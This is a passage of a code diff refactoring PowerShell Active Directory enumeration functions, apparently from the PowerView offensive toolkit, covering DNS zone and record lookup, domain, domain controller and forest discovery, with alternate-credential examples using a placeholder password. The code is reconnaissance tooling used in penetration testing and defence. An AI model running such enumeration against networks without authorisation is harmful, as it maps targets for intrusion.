-    elseif($RDataType -eq 12) {
-        $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]
-        $Data = $Ptr
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'
-    }
+        elseif ($RDataType -eq 6) {
+            # TODO: how to implement properly? nested object?
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'
+        }
 
-    elseif($RDataType -eq 13) {
-        # TODO: how to implement properly? nested object?
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'
-    }
+        elseif ($RDataType -eq 12) {
+            $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]
+            $Data = $Ptr
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'
+        }
 
-    elseif($RDataType -eq 15) {
-        # TODO: how to implement properly? nested object?
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'
-    }
+        elseif ($RDataType -eq 13) {
+            # TODO: how to implement properly? nested object?
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'
+        }
 
-    elseif($RDataType -eq 16) {
+        elseif ($RDataType -eq 15) {
+            # TODO: how to implement properly? nested object?
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'
+        }
+
+        elseif ($RDataType -eq 16) {
+            [string]$TXT  = ''
+            [int]$SegmentLength = $DNSRecord[24]
+            $Index = 25
+
+            while ($SegmentLength-- -gt 0) {
+                $TXT += [char]$DNSRecord[$index++]
+            }
 
-        [string]$TXT  = ""
-        [int]$SegmentLength = $DNSRecord[24]
-        $Index = 25
-        while ($SegmentLength-- -gt 0) {
-            $TXT += [char]$DNSRecord[$index++]
+            $Data = $TXT
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'
         }
 
-        $Data = $TXT
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'
-    }
+        elseif ($RDataType -eq 28) {
+            # TODO: how to implement properly? nested object?
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'
+        }
 
-    elseif($RDataType -eq 28) {
-        # TODO: how to implement properly? nested object?
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'
-    }
+        elseif ($RDataType -eq 33) {
+            # TODO: how to implement properly? nested object?
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'
+        }
 
-    elseif($RDataType -eq 33) {
-        # TODO: how to implement properly? nested object?
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'
-    }
+        else {
+            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'
+        }
 
-    else {
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'
+        $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial
+        $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL
+        $DNSRecordObject | Add-Member Noteproperty 'Age' $Age
+        $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp
+        $DNSRecordObject | Add-Member Noteproperty 'Data' $Data
+        $DNSRecordObject
     }
-
-    $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial
-    $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL
-    $DNSRecordObject | Add-Member Noteproperty 'Age' $Age
-    $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp
-    $DNSRecordObject | Add-Member Noteproperty 'Data' $Data
-    $DNSRecordObject
 }
 
 
-filter Get-DNSZone {
+function Get-DomainDNSZone {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Enumerates the Active Directory DNS zones for a given domain.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty  
+
+.PARAMETER Domain
+
+The domain to query for zones, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+.PARAMETER Properties
 
-       Enumerates the Active Directory DNS zones for a given domain.
+Specifies the properties of the output object to retrieve from the server.
 
-    .PARAMETER Domain
+.PARAMETER ResultPageSize
 
-        The domain to query for zones, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
 
-        Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER PageSize
+.PARAMETER FindOne
 
-        The PageSize to set for the LDAP searcher object.
+Only return one result object.
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER FullData
+.EXAMPLE
 
-        Switch. Return full computer objects instead of just system names (the default).
+Get-DomainDNSZone
 
-    .EXAMPLE
+Retrieves the DNS zones for the current domain.
 
-        PS C:\> Get-DNSZone
+.EXAMPLE
 
-        Retrieves the DNS zones for the current domain.
+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
 
-    .EXAMPLE
+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
 
-        PS C:\> Get-DNSZone -Domain dev.testlab.local -DomainController primary.testlab.local
+.OUTPUTS
 
-        Retrieves the DNS zones for the dev.testlab.local domain, reflecting the LDAP queries
-        through the primary.testlab.local domain controller.
+PowerView.DNSZone
+
+Outputs custom PSObjects with detailed information about the DNS zone.
 #>
 
-    param(
-        [Parameter(Position=0, ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.DNSZone')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
-        [ValidateRange(1,10000)]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
 
-        [Management.Automation.PSCredential]
-        $Credential,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
+        [Alias('ReturnOne')]
         [Switch]
-        $FullData
-    )
+        $FindOne,
 
-    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential
-    $DNSSearcher.filter="(objectClass=dnsZone)"
-
-    if($DNSSearcher) {
-        $Results = $DNSSearcher.FindAll()
-        $Results | Where-Object {$_} | ForEach-Object {
-            # convert/process the LDAP fields for each result
-            $Properties = Convert-LDAPProperty -Properties $_.Properties
-            $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-            if ($FullData) {
-                $Properties
+    PROCESS {
+        $SearcherArguments = @{
+            'LDAPFilter' = '(objectClass=dnsZone)'
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $DNSSearcher1 = Get-DomainSearcher @SearcherArguments
+
+        if ($DNSSearcher1) {
+            if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne()  }
+            else { $Results = $DNSSearcher1.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                $Out = Convert-LDAPProperty -Properties $_.Properties
+                $Out | Add-Member NoteProperty 'ZoneName' $Out.name
+                $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
+                $Out
             }
-            else {
-                $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged
+
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
+                }
             }
+            $DNSSearcher1.dispose()
         }
-        $Results.dispose()
-        $DNSSearcher.dispose()
-    }
-
-    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "CN=MicrosoftDNS,DC=DomainDnsZones"
-    $DNSSearcher.filter="(objectClass=dnsZone)"
 
-    if($DNSSearcher) {
-        $Results = $DNSSearcher.FindAll()
-        $Results | Where-Object {$_} | ForEach-Object {
-            # convert/process the LDAP fields for each result
-            $Properties = Convert-LDAPProperty -Properties $_.Properties
-            $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name
+        $SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones'
+        $DNSSearcher2 = Get-DomainSearcher @SearcherArguments
 
-            if ($FullData) {
-                $Properties
+        if ($DNSSearcher2) {
+            try {
+                if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() }
+                else { $Results = $DNSSearcher2.FindAll() }
+                $Results | Where-Object {$_} | ForEach-Object {
+                    $Out = Convert-LDAPProperty -Properties $_.Properties
+                    $Out | Add-Member NoteProperty 'ZoneName' $Out.name
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
+                    $Out
+                }
+                if ($Results) {
+                    try { $Results.dispose() }
+                    catch {
+                        Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_"
+                    }
+                }
             }
-            else {
-                $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged
+            catch {
+                Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'"
             }
+            $DNSSearcher2.dispose()
         }
-        $Results.dispose()
-        $DNSSearcher.dispose()
     }
 }
 
 
-filter Get-DNSRecord {
+function Get-DomainDNSRecord {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Enumerates the Active Directory DNS records for a given zone.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord  
+
+.DESCRIPTION
+
+Given a specific Active Directory DNS zone name, query for all 'dnsNode'
+LDAP entries using that zone as the search base. Return all DNS entry results
+and use Convert-DNSRecord to try to convert the binary DNS record blobs.
+
+.PARAMETER ZoneName
+
+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
+
+.PARAMETER Domain
+
+The domain to query for zones, defaults to the current domain.
+
+.PARAMETER Server
 
-       Enumerates the Active Directory DNS records for a given zone.
+Specifies an Active Directory server (domain controller) to bind to for the search.
 
-    .PARAMETER ZoneName
+.PARAMETER Properties
 
-        The zone to query for records (which can be enumearted with Get-DNSZone). Required.
+Specifies the properties of the output object to retrieve from the server.
 
-    .PARAMETER Domain
+.PARAMETER ResultPageSize
 
-        The domain to query for zones, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
 
-        Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER PageSize
+.PARAMETER FindOne
 
-        The PageSize to set for the LDAP searcher object.
+Only return one result object.
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DNSRecord -ZoneName testlab.local
+Get-DomainDNSRecord -ZoneName testlab.local
 
-        Retrieve all records for the testlab.local zone.
+Retrieve all records for the testlab.local zone.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DNSZone | Get-DNSRecord
+Get-DomainDNSZone | Get-DomainDNSRecord
 
-        Retrieve all records for all zones in the current domain.
+Retrieve all records for all zones in the current domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DNSZone -Domain dev.testlab.local | Get-DNSRecord -Domain dev.testlab.local
+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
 
-        Retrieve all records for all zones in the dev.testlab.local domain.
+Retrieve all records for all zones in the dev.testlab.local domain.
+
+.OUTPUTS
+
+PowerView.DNSRecord
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
 #>
 
-    param(
-        [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.DNSRecord')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0,  Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $ZoneName,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)]
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"
-    $DNSSearcher.filter="(objectClass=dnsNode)"
+    PROCESS {
+        $SearcherArguments = @{
+            'LDAPFilter' = '(objectClass=dnsNode)'
+            'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $DNSSearcher = Get-DomainSearcher @SearcherArguments
+
+        if ($DNSSearcher) {
+            if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() }
+            else { $Results = $DNSSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                try {
+                    $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged
+                    $Out | Add-Member NoteProperty 'ZoneName' $ZoneName
 
-    if($DNSSearcher) {
-        $Results = $DNSSearcher.FindAll()
-        $Results | Where-Object {$_} | ForEach-Object {
-            try {
-                # convert/process the LDAP fields for each result
-                $Properties = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged
-                $Properties | Add-Member NoteProperty 'ZoneName' $ZoneName
+                    # convert the record and extract the properties
+                    if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {
+                        # TODO: handle multiple nested records properly?
+                        $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0]
+                    }
+                    else {
+                        $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord
+                    }
 
-                # convert the record and extract the properties
-                if ($Properties.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {
-                    # TODO: handle multiple nested records properly?
-                    $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord[0]
+                    if ($Record) {
+                        $Record.PSObject.Properties | ForEach-Object {
+                            $Out | Add-Member NoteProperty $_.Name $_.Value
+                        }
+                    }
+
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord')
+                    $Out
                 }
-                else {
-                    $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord
+                catch {
+                    Write-Warning "[Get-DomainDNSRecord] Error: $_"
+                    $Out
                 }
+            }
 
-                if($Record) {
-                    $Record.psobject.properties | ForEach-Object {
-                        $Properties | Add-Member NoteProperty $_.Name $_.Value
-                    }
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_"
                 }
-
-                $Properties
-            }
-            catch {
-                Write-Warning "ERROR: $_"
-                $Properties
             }
+            $DNSSearcher.dispose()
         }
-        $Results.dispose()
-        $DNSSearcher.dispose()
     }
 }
 
 
-filter Get-NetDomain {
+function Get-Domain {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns the domain object for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        Returns a given domain object.
+.DESCRIPTION
 
-    .PARAMETER Domain
+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
+domain or the domain specified with -Domain X.
 
-        The domain name to query for, defaults to the current domain.
+.PARAMETER Domain
 
-    .PARAMETER Credential
+Specifies the domain name to query for, defaults to the current domain.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        PS C:\> Get-NetDomain -Domain testlab.local
+.EXAMPLE
 
-    .EXAMPLE
+Get-Domain -Domain testlab.local
 
-        PS C:\> "testlab.local" | Get-NetDomain
+.EXAMPLE
 
-    .LINK
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Domain -Credential $Cred
 
-        http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
+.OUTPUTS
+
+System.DirectoryServices.ActiveDirectory.Domain
+
+A complex .NET domain object.
+
+.LINK
+
+http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
 #>
 
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+    [OutputType([System.DirectoryServices.ActiveDirectory.Domain])]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($Credential) {
-        
-        Write-Verbose "Using alternate credentials for Get-NetDomain"
+    PROCESS {
+        if ($PSBoundParameters['Credential']) {
+
+            Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain'
+
+            if ($PSBoundParameters['Domain']) {
+                $TargetDomain = $Domain
+            }
+            else {
+                # if no domain is supplied, extract the logon domain from the PSCredential passed
+                $TargetDomain = $Credential.GetNetworkCredential().Domain
+                Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential"
+            }
 
-        if(!$Domain) {
-            # if no domain is supplied, extract the logon domain from the PSCredential passed
-            $Domain = $Credential.GetNetworkCredential().Domain
-            Write-Verbose "Extracted domain '$Domain' from -Credential"
+            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+
+            try {
+                [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+            }
+            catch {
+                Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
+            }
         }
-   
-        $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-        
-        try {
-            [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+        elseif ($PSBoundParameters['Domain']) {
+            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
+            try {
+                [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+            }
+            catch {
+                Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_"
+            }
         }
-        catch {
-            Write-Verbose "The specified domain does '$Domain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."
-            $Null
+        else {
+            try {
+                [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+            }
+            catch {
+                Write-Verbose "[Get-Domain] Error retrieving the current domain: $_"
+            }
         }
     }
-    elseif($Domain) {
-        $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
-        try {
-            [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+}
+
+
+function Get-DomainController {
+<#
+.SYNOPSIS
+
+Return the domain controllers for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Get-Domain  
+
+.DESCRIPTION
+
+Enumerates the domain controllers for the current or specified domain.
+By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer
+to search for domain controllers.
+
+.PARAMETER Domain
+
+The domain to query for domain controllers, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER LDAP
+
+Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainController -Domain 'test.local'
+
+Determine the domain controllers for 'test.local'.
+
+.EXAMPLE
+
+Get-DomainController -Domain 'test.local' -LDAP
+
+Determine the domain controllers for 'test.local' using LDAP queries.
+
+.EXAMPLE
+
+'test.local' | Get-DomainController
+
+Determine the domain controllers for 'test.local'.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainController -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Computer
+
+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
+
+System.DirectoryServices.ActiveDirectory.DomainController
+
+If -LDAP isn't specified.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.Computer')]
+    [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [String]
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [Switch]
+        $LDAP,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    PROCESS {
+        $Arguments = @{}
+        if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) {
+            if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server }
+
+            # UAC specification for domain controllers
+            $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+
+            Get-DomainComputer @Arguments
         }
-        catch {
-            Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust."
-            $Null
+        else {
+            $FoundDomain = Get-Domain @Arguments
+            if ($FoundDomain) {
+                $FoundDomain.DomainControllers
+            }
         }
     }
-    else {
-        [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
-    }
 }
 
 
-filter Get-NetForest {
+function Get-Forest {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns the forest object for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: ConvertTo-SID  
+
+.DESCRIPTION
 
-        Returns a given forest object.
+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
+forest or the forest specified with -Forest X.
 
-    .PARAMETER Forest
+.PARAMETER Forest
 
-        The forest name to query for, defaults to the current domain.
+The forest name to query for, defaults to the current forest.
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target forest.
 
-    .EXAMPLE
-    
-        PS C:\> Get-NetForest -Forest external.domain
+.EXAMPLE
 
-    .EXAMPLE
-    
-        PS C:\> "external.domain" | Get-NetForest
+Get-Forest -Forest external.domain
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Forest -Credential $Cred
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
+to the forest root domain SID.
 #>
 
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.Management.Automation.PSCustomObject')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Forest,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($Credential) {
-        
-        Write-Verbose "Using alternate credentials for Get-NetForest"
+    PROCESS {
+        if ($PSBoundParameters['Credential']) {
 
-        if(!$Forest) {
-            # if no domain is supplied, extract the logon domain from the PSCredential passed
-            $Forest = $Credential.GetNetworkCredential().Domain
-            Write-Verbose "Extracted domain '$Forest' from -Credential"
-        }
-   
-        $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-        
-        try {
-            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+            Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest"
+
+            if ($PSBoundParameters['Forest']) {
+                $TargetForest = $Forest
+            }
+            else {
+                # if no domain is supplied, extract the logon domain from the PSCredential passed
+                $TargetForest = $Credential.GetNetworkCredential().Domain
+                Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential"
+            }
+
+            $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+
+            try {
+                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+            }
+            catch {
+                Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
+                $Null
+            }
         }
-        catch {
-            Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."
-            $Null
+        elseif ($PSBoundParameters['Forest']) {
+            $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)
+            try {
+                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+            }
+            catch {
+                Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_"
+                return $Null
+            }
         }
-    }
-    elseif($Forest) {
-        $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)
-        try {
-            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
